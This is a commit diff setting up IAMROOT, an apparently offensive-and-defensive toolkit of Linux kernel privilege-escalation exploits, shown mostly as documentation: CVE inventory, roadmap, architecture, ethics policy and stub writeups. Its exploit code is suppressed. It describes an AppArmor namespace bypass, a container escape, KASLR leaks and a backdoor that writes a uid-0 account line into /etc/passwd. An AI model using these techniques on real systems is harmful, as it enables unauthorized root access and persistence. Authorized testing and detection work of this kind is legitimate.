Initial skeleton: README, CVE inventory, roadmap, ARCH, ethics + copy_fail_family module absorbed from DIRTYFAIL

This commit is contained in:
2026-05-16 19:26:24 -04:00
commit cf30b249de
45 changed files with 10336 additions and 0 deletions
+11
View File
@@ -0,0 +1,11 @@
build/
*.o
*.a
*.so
*.dSYM/
modules/*/build/
modules/*/dirtyfail
modules/*/iamroot
.vscode/
.idea/
*.swp
+58
View File
@@ -0,0 +1,58 @@
# CVE inventory
The curated list of CVEs IAMROOT exploits, with patch status and
module status. Updated as new modules land or as upstream patches
ship.
Status legend:
- 🟢 **WORKING** — module verified to land root on a vulnerable host
- 🟡 **PARTIAL** — module detects + exploits on some distros, not all
- 🔵 **DETECT-ONLY** — module fingerprints presence/absence but no
exploit (yet). Useful for blue teams.
-**PLANNED** — stub exists, work not started
- 🔴 **DEPRECATED** — fully patched everywhere relevant; kept for
historical reference only
## Inventory
| CVE | Name | Class | First patched | IAMROOT module | Status | Notes |
|---|---|---|---|---|---|---|
| CVE-2026-31431 | Copy Fail (algif_aead `authencesn` page-cache write) | LPE (page-cache write → /etc/passwd) | mainline 2026-04-22 | `copy_fail_family/copy_fail` | 🟢 | Verified on Ubuntu 26.04, Alma 9, Debian 13. Full AppArmor bypass. |
| CVE-2026-43284 (v4) | Dirty Frag — IPv4 xfrm-ESP page-cache write | LPE (same primitive shape as Copy Fail, different trigger) | mainline 2026-05-XX | `copy_fail_family/dirty_frag_esp` | 🟢 | Full PoC + active-probe scan |
| CVE-2026-43284 (v6) | Dirty Frag — IPv6 xfrm-ESP (`esp6`) | LPE | mainline 2026-05-XX | `copy_fail_family/dirty_frag_esp6` | 🟢 | V6 STORE shift auto-calibrated per kernel build |
| CVE-2026-43500 | Dirty Frag — RxRPC page-cache write | LPE | mainline 2026-05-XX | `copy_fail_family/dirty_frag_rxrpc` | 🟢 | |
| (variant, no CVE) | Copy Fail GCM variant — xfrm-ESP `rfc4106(gcm(aes))` page-cache write | LPE | n/a | `copy_fail_family/copy_fail_gcm` | 🟢 | Sibling primitive, same fix |
| CVE-2022-0847 | Dirty Pipe — pipe `PIPE_BUF_FLAG_CAN_MERGE` write | LPE (arbitrary file write into page cache) | mainline 2022-02-23 | `_stubs/dirty_pipe_cve_2022_0847` | ⚪ | Stub. Public PoCs exist; bundling for completeness. Affects ≤5.16.11, ≤5.15.25, ≤5.10.102 |
| CVE-2023-0458 | EntryBleed — KPTI prefetchnta KASLR bypass | INFO-LEAK (kbase) | mainline (partial mitigations only) | `_stubs/entrybleed_cve_2023_0458` | ⚪ | Stub. Used as STAGE-1 leak brick, not a standalone LPE. Works on lts-6.12.88 (empirical 5/5). |
| CVE-2026-31402 | NFS replay-cache heap overflow | LPE (NFS server) | mainline 2026-04-03 | — | ⚪ | Candidate. Different audience (NFS servers) — TBD whether in-scope. |
| CVE-TBD | Fragnesia (ESP shared-frag in-place encrypt) | LPE (page-cache write) | mainline TBD | `_stubs/fragnesia_TBD` | ⚪ | Stub. Per `findings/audit_leak_write_modprobe_backups_2026-05-16.md`, requires CAP_NET_ADMIN in userns netns — may or may not be in-scope depending on target environment. |
## Pipeline for additions
1. Bug must be **patched in upstream mainline** (we don't bundle
0-days)
2. Either **CVE-assigned** or has clear advisory/patch reference
3. Affects a kernel version range with realistic deployment footprint
(we don't bundle exploits for kernels nobody runs)
4. PoC works on at least one distro+kernel in our CI matrix
5. Detection signature(s) shipped alongside the exploit
## Patch-status tracking
Each module's `kernel-range.json` (planned) declares the affected
range. CI verifies the exploit fails on the first-patched version
and succeeds below it. When a distro backports the fix into a kernel
version below the original first-patched, the matrix updates and
the relevant distro drops out of the "WORKING" list for that module.
## Why we exclude some things
- **0-days the maintainer found themselves**: those go through
responsible disclosure first, then enter IAMROOT after upstream patch
- **kCTF VRP submissions in flight**: same as above; disclosure
before bundling
- **Hardware-specific side channels** (Spectre/Meltdown variants):
out of scope; not page-cache or process-isolation primitives
- **Container-escape only**: unless it cleanly chains to host-root,
out of scope (separate tool space)
+35
View File
@@ -0,0 +1,35 @@
MIT License
Copyright (c) 2026 DIRTYFAIL contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
---
DISCLAIMER FOR SECURITY RESEARCH SOFTWARE
This software is provided for authorized security research, education, and
defensive testing only. By using this software, you agree that:
1. You will only run the exploit modes (--exploit-*) on systems you own or
are explicitly authorized to test.
2. You understand that the exploit modes modify the kernel page cache copy
of /etc/passwd and that this is a privilege-escalation operation while
it persists. The on-disk file is not modified.
3. The authors disclaim all liability for any misuse of this software.
+26
View File
@@ -0,0 +1,26 @@
# IAMROOT top-level Makefile
#
# Phase 0 (current): defers to modules/copy_fail_family/Makefile.
# Phase 1: real dispatcher build that links all modules into one
# binary. See ROADMAP.md.
MODULES := copy_fail_family
.PHONY: all clean $(MODULES)
all: $(MODULES)
$(MODULES):
$(MAKE) -C modules/$@
clean:
@for m in $(MODULES); do \
$(MAKE) -C modules/$$m clean; \
done
rm -rf build/
# Convenience: scan the host using the absorbed DIRTYFAIL-as-module
# until Phase 1's real dispatcher lands.
scan:
@modules/copy_fail_family/dirtyfail --scan 2>/dev/null || \
(echo "Build the copy_fail module first: make copy_fail_family" && exit 1)
+99
View File
@@ -0,0 +1,99 @@
# IAMROOT
> A curated, actively-maintained corpus of Linux kernel LPE exploits —
> bundled with their detection signatures, patch status, and version
> ranges. Run it on a system you own (or are authorized to test) and
> it tells you which historical and recent CVEs that system is still
> vulnerable to, and — with explicit confirmation — gets you root.
```
██╗ █████╗ ███╗ ███╗██████╗ ██████╗ ██████╗ ████████╗
██║██╔══██╗████╗ ████║██╔══██╗██╔═══██╗██╔═══██╗╚══██╔══╝
██║███████║██╔████╔██║██████╔╝██║ ██║██║ ██║ ██║
██║██╔══██║██║╚██╔╝██║██╔══██╗██║ ██║██║ ██║ ██║
██║██║ ██║██║ ╚═╝ ██║██║ ██║╚██████╔╝╚██████╔╝ ██║
╚═╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝
```
> ⚠️ **Authorized testing only.** IAMROOT is a research and red-team
> tool. By using it you assert you have explicit authorization to test
> the target system. See [`docs/ETHICS.md`](docs/ETHICS.md).
## What this is
Most Linux LPE references are dead repos, broken PoCs, or single-CVE
deep-dives. **IAMROOT is a living corpus**: each CVE that lands here
is empirically verified to work on the kernels it claims to target,
CI-tested across a distro matrix, and ships with the detection
signatures defenders need to spot it in their environment.
The same binary covers offense and defense:
- `iamroot --scan` — fingerprint the host, report which bundled CVEs
apply, and which are blocked by patches/config/LSM
- `iamroot --exploit <CVE>` — run the named exploit (with `--i-know`
authorization gate)
- `iamroot --detect-rules` — dump auditd / sigma / yara rules for
every bundled CVE so blue teams can drop them into their tooling
- `iamroot --mitigate` — apply temporary mitigations for CVEs the
host is vulnerable to (sysctl knobs, module blacklists, etc.)
## Status
**Active. Bootstrap phase as of 2026-05-16.** First module
(`copy_fail_family`) absorbed from the standalone DIRTYFAIL project
and is verified working end-to-end on Ubuntu 26.04 + Alma 9 + Debian
13 with full AppArmor bypass + container escape demo + persistent
backdoor mode.
See [`CVES.md`](CVES.md) for the full curated CVE list with patch
status. See [`ROADMAP.md`](ROADMAP.md) for the next planned modules.
## Why this exists
The Linux kernel privilege-escalation space is fragmented:
- **`linux-exploit-suggester` / `linpeas`**: suggest applicable
exploits, don't run them
- **`auto-root-exploit` / `kernelpop`**: bundle exploits, but largely
stale, no CI, no defensive signatures
- **Per-CVE single-PoC repos**: usually one author, often abandoned
within months of release, often only one distro
IAMROOT's bet is that there's room for a single curated bundle that
(1) actively maintains a small set of high-quality exploits across a
multi-distro matrix, and (2) ships detection rules alongside each
exploit so the same project serves both red and blue teams.
## Architecture
Each CVE (or tightly-related family) is a **module** under `modules/`.
Modules export a standard interface: `detect()`, `exploit()`,
`mitigate()`, `cleanup()`, plus metadata describing affected kernel
ranges, distro coverage, and CI test matrix.
Shared infrastructure (AppArmor bypass, su-exploitation primitives,
fingerprinting, common utilities) lives in `core/`.
See [`docs/ARCHITECTURE.md`](docs/ARCHITECTURE.md) for the
module-loader design and how to add a new CVE.
## Build & run
```bash
make # build all modules
sudo ./iamroot --scan # what's this box vulnerable to?
sudo ./iamroot --scan --json # machine-readable output for CI/SOC pipelines
sudo ./iamroot --detect-rules --format=sigma > rules.yml
sudo ./iamroot --exploit copy_fail --i-know # actually run an exploit
```
## Acknowledgments
Each module credits the original CVE reporter and PoC author in its
`NOTICE.md`. IAMROOT is the bundling and bookkeeping layer; the
research credit belongs to the people who found the bugs.
## License
MIT — see [`LICENSE`](LICENSE).
+111
View File
@@ -0,0 +1,111 @@
# Roadmap
What's coming next, in priority order. Dates are aspirational, not
commitments.
## Phase 0 — Bootstrap (DONE as of 2026-05-16)
- [x] Repo structure (modules/, core/, docs/, tools/, tests/)
- [x] Absorbed DIRTYFAIL as the first module
(`modules/copy_fail_family/`)
- [x] Top-level README, CVES.md, ROADMAP.md, docs/ARCHITECTURE.md,
docs/ETHICS.md
- [x] LICENSE (MIT)
- [x] Private GitHub repo
## Phase 1 — Make the bundling real (next session)
- [ ] Top-level `iamroot` dispatcher CLI (`iamroot.c`) — module
registry, fingerprint, route to module's detect/exploit
- [ ] Module interface header (`core/module.h`) — standard
`iamroot_module` struct each module exports
- [ ] Refactor `modules/copy_fail_family/` internals to expose the
standard module interface
- [ ] Extract shared code into `core/`: `apparmor_bypass.c`,
`exploit_su.c`, `common.c`, `fcrypt.c` (currently duplicated
under the absorbed DIRTYFAIL tree)
- [ ] Top-level `Makefile` that builds all modules into one binary
- [ ] Smoke test: `iamroot --scan --json` on Ubuntu 26.04
produces sensible output
## Phase 2 — Add Dirty Pipe (CVE-2022-0847)
Public PoC, well-understood, useful for completeness — IAMROOT
without Dirty Pipe is incomplete as a "historical bundle." Affects
kernels ≤5.16.11/≤5.15.25/≤5.10.102 so coverage is older
deployments (worth bundling — many production boxes still run
these).
- [ ] `modules/dirty_pipe_cve_2022_0847/` — exploit + detect + range
metadata
- [ ] Test matrix: Ubuntu 20.04 (vulnerable kernels), Debian 11
(vulnerable kernels), modern kernels (immune — should detect
as patched)
- [ ] Detection rules: auditd splice/pipe write patterns
## Phase 3 — Add EntryBleed (CVE-2023-0458) as stage-1 leak brick
EntryBleed is **not a standalone LPE**. It's a **kbase leak
primitive** that other modules can chain. Bundle it because:
- Stage-1 of any future "build-your-own LPE" workflow
- Detection rules for KPTI side-channel attempts are useful for
defenders
- Already works empirically on lts-6.12.88 (verified 2026-05-16)
- [ ] `modules/entrybleed_cve_2023_0458/` — leak primitive +
detect-mitigations
- [ ] Exposed as a library helper: other modules can call
`entrybleed_leak_kbase()` when they need a kbase
## Phase 4 — CI matrix
- [ ] Distro+kernel VM matrix in GitHub Actions (Ubuntu 20.04 /
22.04 / 24.04 / 26.04, Debian 11 / 12 / 13, Alma 8 / 9 / 10,
Fedora 39 / 40 / 41)
- [ ] Each module's exploit runs against matched-vulnerable VMs and
MUST land root; runs against patched VMs and MUST fail at
detect step
- [ ] Nightly run; failures open issues automatically
## Phase 5 — Detection signature export
- [ ] `iamroot --detect-rules --format=sigma` — Sigma rules per CVE
- [ ] `--format=yara` — YARA rules for static detection of exploit
binaries
- [ ] `--format=auditd` — auditd `.rules` snippets
- [ ] `--format=falco` — Falco rule snippets
- [ ] Sample SOC playbook in `docs/DETECTION_PLAYBOOK.md`
## Phase 6 — Mitigation mode
- [ ] `iamroot --mitigate` walks the host's vulnerabilities, applies
temporary sysctl / module-blacklist / LSM workarounds
- [ ] Per-CVE rollback procedure if the mitigation breaks something
- [ ] Idempotent: running twice is safe
## Phase 7+ — More modules
Backfill of historical and recent LPEs as time allows:
- [ ] **CVE-2021-3493** — overlayfs nested-userns LPE
- [ ] **CVE-2021-4034** — Pwnkit (pkexec env handling)
- [ ] **CVE-2022-2588** — net/sched route4 dead UAF
- [ ] **CVE-2023-2008** — vmwgfx OOB write
- [ ] **CVE-2024-1086** — netfilter nf_tables UAF
- [ ] Fragnesia (if it lands as a CVE)
- [ ] Anything we ourselves disclose — bundled AFTER upstream patch
ships (responsible-disclosure-first)
## Non-goals
- **No 0-day shipment.** Everything in IAMROOT is post-patch.
- **No automated mass-targeting.** No host-list mode. No automatic
pivoting.
- **No persistence beyond `--exploit-backdoor`'s
`/etc/passwd` overwrite**, which is overt and easily detected by
any auditd rule we ship ourselves. Persistence-as-evasion is out
of scope.
- **No container-runtime escapes** unless they cleanly chain to
host-root.
- **No Windows / macOS / non-Linux targets.** Focus is the moat.
+119
View File
@@ -0,0 +1,119 @@
# Architecture
## Module model
Each CVE (or tightly-related family of CVEs sharing a primitive) is
a **module** under `modules/`. A module is a self-contained
exploit + detection + metadata bundle that exports a standard
interface to the top-level dispatcher.
### Module layout
```
modules/<module_name>/
├── MODULE.md # Human-readable writeup of the bug
├── NOTICE.md # Credits to original researcher
├── kernel-range.json # Machine-readable affected kernels
├── module.c # Implements iamroot_module interface
├── module.h
├── detect/
│ ├── auditd.rules # blue team detection
│ ├── sigma.yml
│ └── yara.yara
├── src/ # exploit internals
└── tests/ # per-module tests (run in CI matrix)
```
### `iamroot_module` interface (planned, Phase 1)
```c
struct iamroot_module {
const char *name; /* "copy_fail" */
const char *cve; /* "CVE-2026-31431" */
const char *summary; /* one-line description */
/* Return 1 if host appears vulnerable, 0 if patched/immune,
* -1 if probe couldn't run. May call entrybleed_leak_kbase()
* etc. from core/ if a leak primitive is needed. */
int (*detect)(struct iamroot_host *host);
/* Run the exploit. Caller has already passed the
* authorization gate. Returns 0 on root acquired,
* nonzero on failure. */
int (*exploit)(struct iamroot_host *host, struct iamroot_opts *opts);
/* Apply a runtime mitigation for this CVE (sysctl, module
* blacklist, etc.). Returns 0 on success. NULL if no
* mitigation is offered. */
int (*mitigate)(struct iamroot_host *host);
/* Undo --exploit-backdoor or --mitigate side effects. */
int (*cleanup)(struct iamroot_host *host);
/* Affected kernel version range, distros covered, etc. */
const struct iamroot_kernel_range *ranges;
size_t n_ranges;
};
```
Modules register themselves at link time via a constructor-attribute
table. The top-level `iamroot` binary iterates the registry on each
invocation.
## Shared `core/`
Code that more than one module needs lives in `core/`:
- `core/common.c` — fingerprinting (kernel version, distro, LSM,
hardening flags), logging, error handling
- `core/apparmor_bypass.c` — Ubuntu's
`apparmor_restrict_unprivileged_userns=1` defeat via
`change_onexec("crun")` re-exec
- `core/exploit_su.c` — once we have page-cache-write or
/etc/passwd-overwrite, this is the shared "drop to root shell"
helper
- `core/fcrypt.c` — file-encryption helpers used by multiple modules
- `core/entrybleed.c` (planned, Phase 3) — kbase leak primitive that
any module needing KASLR-defeat can call
## Top-level dispatcher
`iamroot.c` (planned, Phase 1) is the CLI entry point. Responsibilities:
1. Parse args (`--scan`, `--exploit <name>`, `--mitigate`,
`--detect-rules`, `--cleanup`, etc.)
2. Fingerprint the host
3. For `--scan`: iterate module registry, call each module's
`detect()`, emit table of results
4. For `--exploit <name>`: locate module, gate behind `--i-know`,
call its `exploit()`
5. For `--detect-rules`: walk module registry, concatenate detection
files in the requested format
## CI matrix
`.github/workflows/ci.yml` (planned, Phase 4) runs each module's
test against a matrix of distro × kernel VMs. Each test asserts:
- on a vulnerable VM: `detect()` returns 1, `exploit()` returns 0
and produces uid=0
- on a patched VM: `detect()` returns 0, `exploit()` either refuses
or fails gracefully
Failures on a previously-working matrix entry open an issue
automatically (likely cause: distro shipped a backport that broke
the module).
## Adding a new CVE
1. `git checkout -b add-cve-XXXX-NNNN`
2. `cp -r modules/_stubs/_template modules/<module_name>`
3. Fill in `MODULE.md`, `NOTICE.md`, `kernel-range.json`
4. Implement `module.c` exposing the `iamroot_module` interface
5. Ship at least one detection rule under `detect/`
6. Add tests under `tests/`
7. PR. CI runs the matrix. If it lands root on at least one
vulnerable matched VM AND fails cleanly on a patched VM, it
merges.
See `docs/module-template.md` (planned) for the per-module checklist.
+75
View File
@@ -0,0 +1,75 @@
# Ethics, scope, and acceptable use
## Acceptable use
IAMROOT is intended for:
1. **Authorized red-team / pentest engagements.** You have a written
scope, signed by someone who can authorize testing on the target
systems.
2. **Defensive teams testing detection coverage.** You're using
IAMROOT in a lab to verify your auditd/sigma/falco rules fire as
expected.
3. **Security researchers studying historical LPEs.** You're reading
the code, running it in your own VMs, learning how the primitives
actually work end-to-end.
4. **Build engineers verifying patch coverage.** You're running
`iamroot --scan` against your fleet's golden images to confirm
each known CVE shows up as patched.
## Not-acceptable use
IAMROOT should not be used:
1. On systems you do not own and have not been authorized to test
2. As part of unauthorized access to any system
3. To exfiltrate data or maintain persistence on a system after a
testing engagement is complete
4. To build a worm, scanner, or any tool that automatically targets
systems at scale without per-target authorization
By using IAMROOT you assert that your use falls into the
acceptable-use cases above.
## Why this is publishable
Every CVE bundled in IAMROOT is:
- **Already patched** in upstream mainline kernel
- **Already published** in NVD or distro security trackers
- **Already covered** by existing public PoCs
IAMROOT does not introduce new offensive capability. It bundles,
documents, and CI-tests what is already public — and ships the
detection signatures defenders need to spot it.
The bundling itself raises the baseline competence required to
benefit from this code: a script kiddie can already find and run
single-CVE PoCs on GitHub. Bundling improves quality and CI coverage
without meaningfully changing offensive capability, while providing
real defensive value through the detection-rule exports.
## Disclosure
If you find a bug in IAMROOT itself (incorrect detection, broken
exploit on a kernel where it should work, missing a backport in the
range metadata): file a public GitHub issue.
If you find a **new 0-day kernel LPE while inspired by reading
IAMROOT code**: please disclose it responsibly to the kernel
security team (`security@kernel.org`) and the affected distros
*before* writing a public PoC. Once upstream patch ships and a CVE
is assigned, IAMROOT will gladly accept the module.
## Persistence and stealth are out of scope
`--exploit-backdoor` in the copy_fail module overwrites a
`/etc/passwd` line with a `uid=0` shell account. This is **overt**:
- The username is `iamroot` (was `dirtyfail`) — instantly identifiable
- It's covered by the auditd rules IAMROOT ships
- `--cleanup-backdoor` restores the original line
If you're looking for evasion, persistence, or stealth: not here.
Use a real C2 framework if you have authorization to do so. IAMROOT
stops at "demonstrate that the bug works."
@@ -0,0 +1,47 @@
# Dirty Pipe — CVE-2022-0847
> ⚪ **PLANNED** module. See [`../../ROADMAP.md`](../../ROADMAP.md)
> Phase 2.
## Summary
Pipe-buffer `PIPE_BUF_FLAG_CAN_MERGE` was incorrectly inherited by
`copy_page_to_iter_pipe()` and `push_pipe()` paths, allowing an
unprivileged user to write into the page cache of any file readable
by them.
## Affected kernels
- ≤ 5.16.11
- ≤ 5.15.25 LTS
- ≤ 5.10.102 LTS
## Upstream patch
`9d2231c5d74e13b2a0546fee6737ee4446017903` ("lib/iov_iter: initialize
"flags" in new pipe_buffer")
## Why this module is here
Even in 2026, many production deployments still run vulnerable
kernels (RHEL 7/8, older Ubuntu LTS, embedded). Bundling Dirty Pipe
makes IAMROOT useful as a "historical sweep" tool on long-tail
systems.
## Implementation plan
- C exploit ported from public PoCs (credit upstream authors in
`NOTICE.md` when implemented)
- `detect()`: kernel version check + `/proc/version` parse + test
for fixed-version backports
- `exploit()`: writes `iamroot::0:0:dirtypipe:/:/bin/bash` into
`/etc/passwd`, then `su iamroot` — same shape as copy_fail's
backdoor mode
- Detection rules: auditd on splice() calls + pipe write patterns,
filesystem audit on `/etc/passwd` modification by non-root
## Not started yet
Pick this up after Phase 1 (module-interface refactor of the
copy_fail family) so this module can use the standard
`iamroot_module` shape from the start.
@@ -0,0 +1,56 @@
# EntryBleed — CVE-2023-0458
> ⚪ **PLANNED** stub module. See [`../../ROADMAP.md`](../../ROADMAP.md)
> Phase 3.
## Summary
KPTI's user-space-mapped entry trampoline is detectable via
`prefetchnta` timing, leaking the kernel base address (defeats
KASLR). Universal across modern x86_64 kernels with KPTI; only
partial mitigations have shipped upstream.
## Why this is here
EntryBleed is **not a standalone LPE**. It's a **stage-1 leak
primitive** that future LPE modules can call when they need a kbase.
Bundling it as a module:
1. Lets other modules `#include "core/entrybleed.h"` and call
`entrybleed_leak_kbase()` when they need KASLR defeat
2. Ships defensive detection rules for prefetchnta-timing-attack
patterns (useful for hardened environments)
3. Documents the technique with a clear writeup so users
understand what "stage-1" means in the broader chain
## Empirical status on recent kernels
Verified 2026-05-16: works 5/5 on lts-6.12.88 (no anti-EntryBleed
mitigation configured). See
`security-research/findings/audit_io_uring_2026-05-16_poc_attempt.md`
and the EntryBleed test code at
`SKYFALL/bugs/leak_write_modprobe_2026-05-16/exploit.c` lines ~73-150.
## Upstream patches
There is no single canonical patch. Partial mitigations include:
- `CONFIG_RANDOMIZE_KSTACK_OFFSET` (per-syscall kernel stack jitter)
- Some KPTI hardening discussions on lkml, no merged fix as of
lts-6.12.88
- The community position remains that "KASLR is best-effort,
not a security boundary"
## Implementation plan
- Lift the proven EntryBleed code from
`SKYFALL/bugs/leak_write_modprobe_2026-05-16/exploit.c` into
`module.c` here
- Expose as both a CLI mode (`iamroot --leak-kbase`) and as a
library helper (`uint64_t entrybleed_leak_kbase(void)`)
- Detection rules: timing-attack pattern flags, perf-counter
anomaly detection (informational — these are hard to make precise
without false positives)
## Not started yet
Phase 3.
+27
View File
@@ -0,0 +1,27 @@
# Fragnesia — CVE pending
> ⚪ **PLANNED** stub. See [`../../ROADMAP.md`](../../ROADMAP.md)
> Phase 7+.
## Summary
ESP shared-frag in-place encrypt path can be coerced into writing
into the page cache of an unrelated file. Same primitive shape as
Dirty Frag, different reach.
## Status
Audit-stage. See
`security-research/findings/audit_leak_write_modprobe_backups_2026-05-16.md`
section on backup primitives. Notably: trigger appears to require
CAP_NET_ADMIN inside a userns netns. On kCTF (shared net_ns) that's
cap-dead, but on host systems where user_ns clone is enabled it's
reachable.
## Decision needed before implementing
Is the unprivileged-userns-netns scenario in scope for IAMROOT? If
yes, this module ships. If we restrict to "default Linux user
account, no namespace tricks," this module is out of scope.
## Not started.
File diff suppressed because it is too large Load Diff
+93
View File
@@ -0,0 +1,93 @@
# DIRTYFAIL — Makefile
#
# Builds a single statically-linked binary `dirtyfail` from src/*.c.
#
# Targets:
# make build optimized binary
# make debug build with -O0 -g for gdb
# make static build a fully static binary (musl recommended for portability)
# make clean remove build artifacts
# make scan build and run --scan against localhost
#
# Build prerequisites: gcc or clang, make, libc headers including
# <linux/xfrm.h>. On Debian/Ubuntu: `apt install build-essential linux-libc-dev`.
# On RHEL/Fedora: `dnf install gcc make kernel-headers`.
CC ?= gcc
CFLAGS ?= -O2 -Wall -Wextra -Wno-unused-parameter -Wno-pointer-arith \
-D_GNU_SOURCE -D_FILE_OFFSET_BITS=64
LDFLAGS ?=
SRC_DIR := src
BUILD := build
SOURCES := $(wildcard $(SRC_DIR)/*.c)
OBJECTS := $(patsubst $(SRC_DIR)/%.c,$(BUILD)/%.o,$(SOURCES))
BIN := dirtyfail
.PHONY: all debug static clean scan install test test-fcrypt test-aes-ecb
all: $(BIN)
# === Tests ===========================================================
#
# make test build + run all primitive selftests
# make test-fcrypt just fcrypt (cipher, brute force) — runs anywhere
# make test-aes-ecb AF_ALG ecb(aes) round-trip — Linux only
#
# Tests live in tests/, build standalone executables that link the
# minimum from src/. They don't pull in netlink / xfrm / rxrpc — those
# require root or AA bypass to exercise meaningfully and are tested
# end-to-end via `--exploit-* --no-shell` on a target host instead.
TEST_DIR := tests
TEST_BUILD:= $(BUILD)/tests
# fcrypt selftest needs only fcrypt + common (for log_*) — no Linux deps
$(TEST_BUILD)/test_fcrypt: $(TEST_DIR)/test_fcrypt.c $(SRC_DIR)/fcrypt.c $(SRC_DIR)/common.c | $(TEST_BUILD)
$(CC) $(CFLAGS) -I$(SRC_DIR) -o $@ $^
# AES-ECB AF_ALG round-trip — Linux only, no DIRTYFAIL src deps
$(TEST_BUILD)/test_aes_ecb: $(TEST_DIR)/test_aes_ecb.c | $(TEST_BUILD)
$(CC) $(CFLAGS) -o $@ $^
$(TEST_BUILD): | $(BUILD)
@mkdir -p $(TEST_BUILD)
test-fcrypt: $(TEST_BUILD)/test_fcrypt
@echo "=== test_fcrypt ==="
$<
@echo ""
test-aes-ecb: $(TEST_BUILD)/test_aes_ecb
@echo "=== test_aes_ecb ==="
$<
@echo ""
test: test-fcrypt test-aes-ecb
@echo "=== all primitive selftests passed ==="
$(BIN): $(OBJECTS)
$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^
$(BUILD)/%.o: $(SRC_DIR)/%.c $(SRC_DIR)/common.h | $(BUILD)
$(CC) $(CFLAGS) -I$(SRC_DIR) -c -o $@ $<
$(BUILD):
@mkdir -p $(BUILD)
debug: CFLAGS := -O0 -g3 -Wall -Wextra -Wno-unused-parameter -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64
debug: clean $(BIN)
# `make static` works best with musl-gcc; glibc static linking pulls in
# NSS at runtime which breaks getpwnam.
static: LDFLAGS += -static
static: clean $(BIN)
clean:
rm -rf $(BUILD) $(BIN)
scan: $(BIN)
./$(BIN) --scan
install: $(BIN)
install -m 0755 $(BIN) /usr/local/bin/dirtyfail
+72
View File
@@ -0,0 +1,72 @@
# NOTICE
## fcrypt S-box constants and key schedule
`src/fcrypt.c` contains the four 256-byte S-box tables `SBOX0_RAW`,
`SBOX1_RAW`, `SBOX2_RAW`, and `SBOX3_RAW`, along with the 56-bit key
packing and 11-bit-rotation key schedule for the rxkad fcrypt cipher.
These tables and the key schedule are **protocol constants** of the
Andrew File System (AFS) rxkad authentication scheme. They appear
verbatim in:
- The Linux kernel's `crypto/fcrypt.c` (GPL-2.0,
Copyright © David Howells / KTH)
- IBM's open-source AFS distribution
- OpenAFS upstream
- Heimdal Kerberos (rxkad implementation)
Cryptographic constants required by a wire protocol are facts about
the protocol, not creative expression — using them is what makes
interoperability with the Linux kernel possible. We list this here for
transparency: while the S-box bytes are identical to the kernel's
table, the rest of `src/fcrypt.c` (table preprocessing, brute-force
harness, predicates, splitmix64 search) is independently written
DIRTYFAIL code under the project's MIT license.
If you intend to redistribute DIRTYFAIL in a context where strict
license compatibility matters, treat `src/fcrypt.c` as carrying the
same license obligations as the kernel `crypto/fcrypt.c` source for
the S-box constants alone.
## Reference exploits
The detection and exploit techniques in DIRTYFAIL were studied from:
- [Smarttfoxx/copyfail](https://github.com/Smarttfoxx/copyfail) — Copy
Fail original C PoC
- [rootsecdev/cve_2026_31431](https://github.com/rootsecdev/cve_2026_31431)
— Copy Fail Python detector + UID-flip exploit
- [V4bel/dirtyfrag](https://github.com/V4bel/dirtyfrag) — Dirty Frag
full chain PoC by Hyunwoo Kim ([@v4bel](https://x.com/v4bel))
DIRTYFAIL implementations are independently written in C, organized
around a single binary with detection-first defaults, but the protocol
mechanics (XFRM SA layout, RxRPC handshake forgery, rxkad checksum
formula) are necessarily identical to the upstream PoCs because they
target the same kernel interfaces.
## Additional techniques from 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo
The following DIRTYFAIL features draw on techniques first published by
[0xdeadbeefnetwork](https://github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo):
- `src/copyfail_gcm.c``rfc4106(gcm(aes))` AEAD in xfrm-ESP, using
AES-GCM keystream brute-force to land a single byte at an arbitrary
file offset. Reimplemented in DIRTYFAIL style using AF_ALG instead
of OpenSSL EVP, eliminating the `libssl-dev` runtime dependency.
- `src/dirtyfrag_esp6.c` — IPv6 dual of xfrm-ESP. cf2 demonstrated the
esp6 size-gate workaround (≥48-byte frame); we reproduce that with
an 8-byte vmsplice'd pad.
- `src/apparmor_bypass.c` — the `change_onexec(crun)`
`change_onexec(chrome)` → unshare re-exec dance to escape Ubuntu's
unprivileged-userns AppArmor restriction. cf2 credits the technique
to Brad Spengler (grsecurity); we expose it as a `--aa-bypass` flag
and auto-arm it when a restrictive profile is detected.
- `src/backdoor.c` — length-matched overwrite of a `nologin` line in
/etc/passwd with `dirtyfail::0:0:<pad>:/:/bin/bash`. cf2 publishes
the shell-script harness (and uses the username `sick`); DIRTYFAIL
ports it into a single C function driving our 1-byte primitive,
with the username matched to this project for easy auditing.
See [README §11 — Credits](README.md#11-credits) for the full list.
+365
View File
@@ -0,0 +1,365 @@
/*
* DIRTYFAIL — apparmor_bypass.c
*
* Implementation of the "switch profile + unshare" trick for getting
* CAP_NET_ADMIN inside a fresh user namespace on hardened Ubuntu.
* See apparmor_bypass.h for the high-level design.
*
* ATTRIBUTION: technique published in 0xdeadbeefnetwork/Copy_Fail2-
* Electric_Boogaloo (`aa-rootns.c`), credited there to Brad Spengler.
* This is an independent reimplementation in DIRTYFAIL's structure.
*/
#include "apparmor_bypass.h"
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/wait.h>
#ifdef __linux__
#include <sched.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <linux/capability.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/if.h>
#include <sys/ioctl.h>
#endif
#ifndef CLONE_NEWUSER
#define CLONE_NEWUSER 0x10000000
#endif
